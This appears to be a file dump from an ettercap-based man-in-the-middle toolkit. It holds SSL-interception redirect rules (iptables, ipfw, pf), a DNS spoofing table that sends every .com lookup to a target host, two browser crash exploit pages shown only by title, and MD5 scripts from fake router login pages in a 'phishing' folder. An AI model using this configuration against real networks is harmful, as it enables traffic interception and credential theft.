tcp / udp 85 | vrrp = 112 # ip 112 (IPPROTO 0x70) 86 | nntp = 119 # tcp 119 87 | smb = 139,445 # tcp 139 445 88 | imap = 143,220 # tcp 143 220 89 | snmp = 161 # udp 161 90 | bgp = 179 # tcp 179 91 | ldap = 389 # tcp 389 92 | https = 443 # tcp 443 93 | ssmtp = 465 # tcp 465 94 | rlogin = 512,513 # tcp 512 513 95 | rip = 520 # udp 520 96 | nntps = 563 # tcp 563 97 | ldaps = 636 # tcp 636 98 | telnets = 992 # tcp 992 99 | imaps = 993 # tcp 993 100 | ircs = 994 # tcp 993 101 | pop3s = 995 # tcp 995 102 | socks = 1080 # tcp 1080 103 | radius = 1645,1646 # udp 1645 1646 104 | msn = 1863 # tcp 1863 105 | cvs = 2401 # tcp 2401 106 | mysql = 3306 # tcp 3306 107 | icq = 5190 # tcp 5190 108 | ymsg = 5050 # tcp 5050 109 | mdns = 5353 # udp 5353 110 | vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903 111 | x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003 112 | irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669 113 | gg = 8074 # tcp 8074 114 | proxy = 8080 # tcp 8080 115 | rcon = 27015,27960 # udp 27015 27960 116 | ppp = 34827 # special case ;) this is the Net Layer code 117 | TN3270 = 23,992 # tcp 23 992 118 | 119 | # 120 | # you can change the colors of the curses GUI. 121 | # here is a list of values: 122 | # 0 Black 4 Blue 123 | # 1 Red 5 Magenta 124 | # 2 Green 6 Cyan 125 | # 3 Yellow 7 White 126 | # 127 | [curses] 128 | color_bg = 0 129 | color_fg = 7 130 | color_join1 = 2 131 | color_join2 = 4 132 | color_border = 7 133 | color_title = 3 134 | color_focus = 6 135 | color_menu_bg = 4 136 | color_menu_fg = 6 137 | color_window_bg = 4 138 | color_window_fg = 7 139 | color_selection_bg = 6 140 | color_selection_fg = 6 141 | color_error_bg = 1 142 | color_error_fg = 3 143 | color_error_border = 3 144 | 145 | # 146 | # This section includes all the configurations that needs a string as a 147 | # parmeter such as the redirect command for SSL mitm attack. 148 | # 149 | [strings] 150 | 151 | # the default encoding to be used for the UTF-8 visualization 152 | utf8_encoding = "ISO-8859-1" 153 | 154 | 155 | # the command used by the remote_browser plugin 156 | # remote_browser = "xdg-open http://%host%url" 157 | # remote_browser = "iceweasel -remote openurl http://%host%url" 158 | remote_browser = "firefox -remote openurl http://%host%url" 159 | 160 | 161 | ##################################### 162 | # redir_command_on/off 163 | ##################################### 164 | # you must provide a valid script for your operating system in order to have 165 | # the SSL dissection available 166 | # note that the cleanup script is executed without enough privileges (because 167 | # they are dropped on startup). so you have to either: provide a setuid program 168 | # or set the ec_uid to 0, in order to be sure the cleanup script will be 169 | # executed properly 170 | # NOTE: the script must fit into one line with a maximum of 255 characters 171 | 172 | #--------------- 173 | # Linux 174 | #--------------- 175 | 176 | # if you use ipchains: 177 | #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" 178 | #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" 179 | 180 | # if you use iptables: 181 | #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 182 | #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 183 | 184 | #--------------- 185 | # Mac Os X 186 | #--------------- 187 | 188 | # quick and dirty way: 189 | #redir_command_on = "ipfw -q add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface" 190 | #redir_command_off = "ipfw -q delete set %set" 191 | 192 | # a better solution is to use a script that keeps track of the rules interted 193 | # and then deletes them on exit: 194 | 195 | # redir_command_on: 196 | # ----- cut here ------- 197 | # #!/bin/sh 198 | # if [ -a "/tmp/osx_ipfw_rules" ]; then 199 | # ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 200 | # else 201 | # ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules 202 | # fi 203 | # ----- cut here ------- 204 | 205 | # redir_command_off: 206 | # ----- cut here ------- 207 | # #!/bin/sh 208 | # if [ -a "/tmp/osx_ipfw_rules" ]; then 209 | # ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules` 210 | # rm -f /tmp/osx_ipfw_rules 211 | # fi 212 | # ----- cut here ------- 213 | 214 | #--------------- 215 | # FreeBSD 216 | #--------------- 217 | 218 | # Before OF can be used, make sure the kernel module has been loaded by 219 | # `kldstat | grep pf.ko`. If the rusult is empty, you can load it by 220 | # `kldload pf.ko` or add 'pf_enable="YES"' to the /etc/rc.conf and reboot. 221 | 222 | # Check if the PF status is enabled by 223 | # `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with 224 | # `pfctl -e`. 225 | 226 | #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to any port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" 227 | #redir_command_off = "pfctl -Psn 2> /dev/null | grep -v %port | pfctl -f - 2> /dev/null" 228 | 229 | 230 | #--------------- 231 | # Open BSD 232 | #--------------- 233 | 234 | # unfortunately the pfctl command does not accepts direct rules adding 235 | # you have to use a script which executed the following command: 236 | 237 | # ----- cut here ------- 238 | # #!/bin/sh 239 | # rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f - 240 | # ----- cut here ------- 241 | 242 | # it's important to remember that you need "rdr-anchor sslsniff" in your 243 | # pf.conf in the TRANSLATION section. 244 | 245 | #redir_command_on = "the_script_described_above %iface %port %rport" 246 | #redir_command_off = "pfctl -a sslsniff -Fn" 247 | 248 | # also, if you create a group called "pfusers" and have EC_GID be that group, 249 | # you can do something like: 250 | # chgrp pfusers /dev/pf 251 | # chmod g+rw /dev/pf 252 | # such that all users in "pfusers" can run pfctl commands; thus allowing non-root 253 | # execution of redir commands. 254 | 255 | 256 | ########## 257 | # EOF # 258 | ########## 259 | -------------------------------------------------------------------------------- /bin/etter.dns: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # ettercap -- etter.dns -- host file for dns_spoof plugin # 4 | # # 5 | # Copyright (C) ALoR & NaGA # 6 | # # 7 | # This program is free software; you can redistribute it and/or modify # 8 | # it under the terms of the GNU General Public License as published by # 9 | # the Free Software Foundation; either version 2 of the License, or # 10 | # (at your option) any later version. # 11 | # # 12 | ############################################################################ 13 | 14 | 15 | 16 | 17 | 18 | ########################################### 19 | # morpheus domain name redirections # 20 | ########################################### 21 | 22 | .com A TaRgEt 23 | *.com A TaRgEt 24 | .com PTR TaRgEt # Wildcards in PTR are not allowed 25 | 26 | .PrE A TaRgEt 27 | *.PrE A TaRgEt 28 | .PrE PTR TaRgEt # Wildcards in PTR are not allowed 29 | 30 | 31 | 32 | ########################################## 33 | # no one out there can have our domains... 34 | # 35 | 36 | www.alor.org A 127.0.0.1 37 | www.naga.org A 127.0.0.1 38 | 39 | ############################################### 40 | # one day we will have our ettercap.org domain 41 | # 42 | 43 | www.ettercap.org A 127.0.0.1 44 | ettercap.sourceforge.net A 216.136.171.201 45 | 46 | ############################################### 47 | # some MX examples 48 | # 49 | 50 | alor.org MX 127.0.0.1 51 | naga.org MX 127.0.0.1 52 | 53 | ############################################### 54 | # This messes up NetBIOS clients using DNS 55 | # resolutions. I.e. Windows/Samba file sharing. 56 | # 57 | 58 | LAB-PC* WINS 127.0.0.1 59 | 60 | # vim:ts=8:noexpandtab 61 | -------------------------------------------------------------------------------- /bin/phishing/Android-DOS-4.0.3.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Android 4.0.3 - Browser Remote Crash Exploit (HeapSpray) 4 | 5 | 10 | 11 | 12 | 13 | 14 | 24 | 25 | -------------------------------------------------------------------------------- /bin/phishing/EasterEgg.html: -------------------------------------------------------------------------------- 1 | - OWNED - 2 | -------------------------------------------------------------------------------- /bin/phishing/Firefox-D0S-49.0.1.html: -------------------------------------------------------------------------------- 1 | 2 | Firefox 49.0.1 - Browser Remote Crash Exploit (Heap-Spray) 3 | 4 | 11 | 12 | 27 | 28 | -------------------------------------------------------------------------------- /bin/phishing/Google_prank_180/googlelogo_color_272x92dp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/Google_prank_180/googlelogo_color_272x92dp.png -------------------------------------------------------------------------------- /bin/phishing/miss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/miss.png -------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/img_wireless_bottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/DLINK/img_wireless_bottom.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/DLINK/logo.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/md5.js: -------------------------------------------------------------------------------- 1 | /* 2 | * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message 3 | * Digest Algorithm, as defined in RFC 1321. 4 | * Version 2.1 Copyright (C) Paul Johnston 1999 - 2002. 5 | * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet 6 | * Distributed under the BSD License 7 | * See http://pajhome.org.uk/crypt/md5 for more info. 8 | */ 9 | 10 | /* 11 | * Configurable variables. You may need to tweak these to be compatible with 12 | * the server-side, but the defaults work in most cases. 13 | */ 14 | var hexcase = 0; /* hex output format. 0 - lowercase; 1 - uppercase */ 15 | var b64pad = ""; /* base-64 pad character. "=" for strict RFC compliance */ 16 | var chrsz = 8; /* bits per input character. 8 - ASCII; 16 - Unicode */ 17 | 18 | /* 19 | * These are the functions you'll usually want to call 20 | * They take string arguments and return either hex or base-64 encoded strings 21 | */ 22 | function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));} 23 | function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));} 24 | function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));} 25 | function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); } 26 | function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); } 27 | function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); } 28 | 29 | /* 30 | * Perform a simple self-test to see if the VM is working 31 | */ 32 | function md5_vm_test() 33 | { 34 | return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72"; 35 | } 36 | 37 | /* 38 | * Calculate the MD5 of an array of little-endian words, and a bit length 39 | */ 40 | function core_md5(x, len) 41 | { 42 | /* append padding */ 43 | x[len >> 5] |= 0x80 << ((len) % 32); 44 | x[(((len + 64) >>> 9) << 4) + 14] = len; 45 | 46 | var a = 1732584193; 47 | var b = -271733879; 48 | var c = -1732584194; 49 | var d = 271733878; 50 | 51 | for(var i = 0; i < x.length; i += 16) 52 | { 53 | var olda = a; 54 | var oldb = b; 55 | var oldc = c; 56 | var oldd = d; 57 | 58 | a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936); 59 | d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586); 60 | c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819); 61 | b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330); 62 | a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897); 63 | d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426); 64 | c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341); 65 | b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983); 66 | a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416); 67 | d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417); 68 | c = md5_ff(c, d, a, b, x[i+10], 17, -42063); 69 | b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162); 70 | a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682); 71 | d = md5_ff(d, a, b, c, x[i+13], 12, -40341101); 72 | c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290); 73 | b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329); 74 | 75 | a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510); 76 | d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632); 77 | c = md5_gg(c, d, a, b, x[i+11], 14, 643717713); 78 | b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302); 79 | a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691); 80 | d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083); 81 | c = md5_gg(c, d, a, b, x[i+15], 14, -660478335); 82 | b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848); 83 | a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438); 84 | d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690); 85 | c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961); 86 | b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501); 87 | a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467); 88 | d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784); 89 | c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473); 90 | b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734); 91 | 92 | a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558); 93 | d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463); 94 | c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562); 95 | b = md5_hh(b, c, d, a, x[i+14], 23, -35309556); 96 | a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060); 97 | d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353); 98 | c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632); 99 | b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640); 100 | a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174); 101 | d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222); 102 | c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979); 103 | b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189); 104 | a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487); 105 | d = md5_hh(d, a, b, c, x[i+12], 11, -421815835); 106 | c = md5_hh(c, d, a, b, x[i+15], 16, 530742520); 107 | b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651); 108 | 109 | a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844); 110 | d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415); 111 | c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905); 112 | b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055); 113 | a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571); 114 | d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606); 115 | c = md5_ii(c, d, a, b, x[i+10], 15, -1051523); 116 | b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799); 117 | a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359); 118 | d = md5_ii(d, a, b, c, x[i+15], 10, -30611744); 119 | c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380); 120 | b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649); 121 | a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070); 122 | d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379); 123 | c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259); 124 | b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551); 125 | 126 | a = safe_add(a, olda); 127 | b = safe_add(b, oldb); 128 | c = safe_add(c, oldc); 129 | d = safe_add(d, oldd); 130 | } 131 | return Array(a, b, c, d); 132 | 133 | } 134 | 135 | /* 136 | * These functions implement the four basic operations the algorithm uses. 137 | */ 138 | function md5_cmn(q, a, b, x, s, t) 139 | { 140 | return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b); 141 | } 142 | function md5_ff(a, b, c, d, x, s, t) 143 | { 144 | return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t); 145 | } 146 | function md5_gg(a, b, c, d, x, s, t) 147 | { 148 | return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t); 149 | } 150 | function md5_hh(a, b, c, d, x, s, t) 151 | { 152 | return md5_cmn(b ^ c ^ d, a, b, x, s, t); 153 | } 154 | function md5_ii(a, b, c, d, x, s, t) 155 | { 156 | return md5_cmn(c ^ (b | (~d)), a, b, x, s, t); 157 | } 158 | 159 | /* 160 | * Calculate the HMAC-MD5, of a key and some data 161 | */ 162 | function core_hmac_md5(key, data) 163 | { 164 | var bkey = str2binl(key); 165 | if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz); 166 | 167 | var ipad = Array(16), opad = Array(16); 168 | for(var i = 0; i < 16; i++) 169 | { 170 | ipad[i] = bkey[i] ^ 0x36363636; 171 | opad[i] = bkey[i] ^ 0x5C5C5C5C; 172 | } 173 | 174 | var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz); 175 | return core_md5(opad.concat(hash), 512 + 128); 176 | } 177 | 178 | /* 179 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally 180 | * to work around bugs in some JS interpreters. 181 | */ 182 | function safe_add(x, y) 183 | { 184 | var lsw = (x & 0xFFFF) + (y & 0xFFFF); 185 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16); 186 | return (msw << 16) | (lsw & 0xFFFF); 187 | } 188 | 189 | /* 190 | * Bitwise rotate a 32-bit number to the left. 191 | */ 192 | function bit_rol(num, cnt) 193 | { 194 | return (num << cnt) | (num >>> (32 - cnt)); 195 | } 196 | 197 | /* 198 | * Convert a string to an array of little-endian words 199 | * If chrsz is ASCII, characters >255 have their hi-byte silently ignored. 200 | */ 201 | function str2binl(str) 202 | { 203 | var bin = Array(); 204 | var mask = (1 << chrsz) - 1; 205 | for(var i = 0; i < str.length * chrsz; i += chrsz) 206 | bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32); 207 | return bin; 208 | } 209 | 210 | /* 211 | * Convert an array of little-endian words to a string 212 | */ 213 | function binl2str(bin) 214 | { 215 | var str = ""; 216 | var mask = (1 << chrsz) - 1; 217 | for(var i = 0; i < bin.length * 32; i += chrsz) 218 | str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask); 219 | return str; 220 | } 221 | 222 | /* 223 | * Convert an array of little-endian words to a hex string. 224 | */ 225 | function binl2hex(binarray) 226 | { 227 | var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef"; 228 | var str = ""; 229 | for(var i = 0; i < binarray.length * 4; i++) 230 | { 231 | str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) + 232 | hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF); 233 | } 234 | return str; 235 | } 236 | 237 | /* 238 | * Convert an array of little-endian words to a base-64 string 239 | */ 240 | function binl2b64(binarray) 241 | { 242 | var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 243 | var str = ""; 244 | for(var i = 0; i < binarray.length * 4; i += 3) 245 | { 246 | var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16) 247 | | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 ) 248 | | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF); 249 | for(var j = 0; j < 4; j++) 250 | { 251 | if(i * 8 + j * 6 > binarray.length * 32) str += b64pad; 252 | else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F); 253 | } 254 | } 255 | return str; 256 | } 257 | 258 | function md5_js_loaded() { return true; } 259 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/substyle_DIR-615.css: -------------------------------------------------------------------------------- 1 | /* CSS substyle for variations applicable to specific products */ 2 | 3 | #modnum_image { 4 | width: 125px; 5 | height: 25px; 6 | background-image: url(short_modnum_DIR-615.gif); 7 | } -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/encrypt.js.download: -------------------------------------------------------------------------------- 1 | function hex_md5(s) 2 | { 3 | return binl2hex(core_md5(str2binl(s), s.length * 8)); 4 | } 5 | 6 | function core_md5(x, len) 7 | { 8 | /* append padding */ 9 | x[len >> 5] |= 0x80 << ((len) % 32); 10 | x[(((len + 64) >>> 9) << 4) + 14] = len; 11 | 12 | var a = 1732584193; 13 | var b = -271733879; 14 | var c = -1732584194; 15 | var d = 271733878; 16 | 17 | for(var i = 0; i < x.length; i += 16) 18 | { 19 | var olda = a; 20 | var oldb = b; 21 | var oldc = c; 22 | var oldd = d; 23 | 24 | a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936); 25 | d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586); 26 | c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819); 27 | b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330); 28 | a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897); 29 | d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426); 30 | c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341); 31 | b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983); 32 | a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416); 33 | d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417); 34 | c = md5_ff(c, d, a, b, x[i+10], 17, -42063); 35 | b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162); 36 | a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682); 37 | d = md5_ff(d, a, b, c, x[i+13], 12, -40341101); 38 | c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290); 39 | b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329); 40 | 41 | a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510); 42 | d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632); 43 | c = md5_gg(c, d, a, b, x[i+11], 14, 643717713); 44 | b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302); 45 | a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691); 46 | d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083); 47 | c = md5_gg(c, d, a, b, x[i+15], 14, -660478335); 48 | b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848); 49 | a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438); 50 | d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690); 51 | c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961); 52 | b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501); 53 | a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467); 54 | d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784); 55 | c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473); 56 | b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734); 57 | 58 | a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558); 59 | d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463); 60 | c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562); 61 | b = md5_hh(b, c, d, a, x[i+14], 23, -35309556); 62 | a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060); 63 | d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353); 64 | c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632); 65 | b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640); 66 | a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174); 67 | d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222); 68 | c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979); 69 | b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189); 70 | a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487); 71 | d = md5_hh(d, a, b, c, x[i+12], 11, -421815835); 72 | c = md5_hh(c, d, a, b, x[i+15], 16, 530742520); 73 | b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651); 74 | 75 | a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844); 76 | d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415); 77 | c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905); 78 | b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055); 79 | a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571); 80 | d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606); 81 | c = md5_ii(c, d, a, b, x[i+10], 15, -1051523); 82 | b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799); 83 | a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359); 84 | d = md5_ii(d, a, b, c, x[i+15], 10, -30611744); 85 | c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380); 86 | b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649); 87 | a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070); 88 | d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379); 89 | c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259); 90 | b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551); 91 | 92 | a = safe_add(a, olda); 93 | b = safe_add(b, oldb); 94 | c = safe_add(c, oldc); 95 | d = safe_add(d, oldd); 96 | } 97 | return Array(a, b, c, d); 98 | 99 | } 100 | 101 | function md5_cmn(q, a, b, x, s, t) 102 | { 103 | return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b); 104 | } 105 | function md5_ff(a, b, c, d, x, s, t) 106 | { 107 | return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t); 108 | } 109 | function md5_gg(a, b, c, d, x, s, t) 110 | { 111 | return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t); 112 | } 113 | function md5_hh(a, b, c, d, x, s, t) 114 | { 115 | return md5_cmn(b ^ c ^ d, a, b, x, s, t); 116 | } 117 | function md5_ii(a, b, c, d, x, s, t) 118 | { 119 | return md5_cmn(c ^ (b | (~d)), a, b, x, s, t); 120 | } 121 | 122 | /* 123 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally 124 | * to work around bugs in some JS interpreters. 125 | */ 126 | function safe_add(x, y) 127 | { 128 | var lsw = (x & 0xFFFF) + (y & 0xFFFF); 129 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16); 130 | return (msw << 16) | (lsw & 0xFFFF); 131 | } 132 | 133 | function bit_rol(num, cnt) 134 | { 135 | return (num << cnt) | (num >>> (32 - cnt)); 136 | } 137 | 138 | function str2binl(str) 139 | { 140 | var bin = Array(); 141 | var mask = (1 << 8) - 1; 142 | for(var i = 0; i < str.length * 8; i += 8) 143 | bin[i>>5] |= (str.charCodeAt(i / 8) & mask) << (i%32); 144 | return bin; 145 | } 146 | 147 | function binl2hex(binarray) 148 | { 149 | var hex_tab = "0123456789abcdef"; 150 | var str = ""; 151 | for(var i = 0; i < binarray.length * 4; i++) 152 | { 153 | str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) + 154 | hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF); 155 | } 156 | return str; 157 | } 158 | 159 | function Base64Encoding(input) 160 | { 161 | var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 162 | var output = ""; 163 | var chr1, chr2, chr3, enc1, enc2, enc3, enc4; 164 | var i = 0; 165 | 166 | //input = utf8_encode(input); 167 | 168 | while (i < input.length) 169 | { 170 | 171 | chr1 = input.charCodeAt(i++); 172 | chr2 = input.charCodeAt(i++); 173 | chr3 = input.charCodeAt(i++); 174 | 175 | enc1 = chr1 >> 2; 176 | enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 177 | enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 178 | enc4 = chr3 & 63; 179 | 180 | if (isNaN(chr2)) { 181 | enc3 = enc4 = 64; 182 | } else if (isNaN(chr3)) { 183 | enc4 = 64; 184 | } 185 | 186 | output = output + 187 | keyStr.charAt(enc1) + keyStr.charAt(enc2) + 188 | keyStr.charAt(enc3) + keyStr.charAt(enc4); 189 | 190 | } 191 | 192 | return output; 193 | } 194 | 195 | function utf8_encode (string) 196 | { 197 | string = string.replace(/\r\n/g,"\n"); 198 | var utftext = ""; 199 | 200 | for (var n = 0; n < string.length; n++) { 201 | 202 | var c = string.charCodeAt(n); 203 | 204 | if (c < 128) { 205 | utftext += String.fromCharCode(c); 206 | } 207 | else if((c > 127) && (c < 2048)) { 208 | utftext += String.fromCharCode((c >> 6) | 192); 209 | utftext += String.fromCharCode((c & 63) | 128); 210 | } 211 | else { 212 | utftext += String.fromCharCode((c >> 12) | 224); 213 | utftext += String.fromCharCode(((c >> 6) & 63) | 128); 214 | utftext += String.fromCharCode((c & 63) | 128); 215 | } 216 | 217 | } 218 | 219 | return utftext; 220 | } -------------------------------------------------------------------------------- 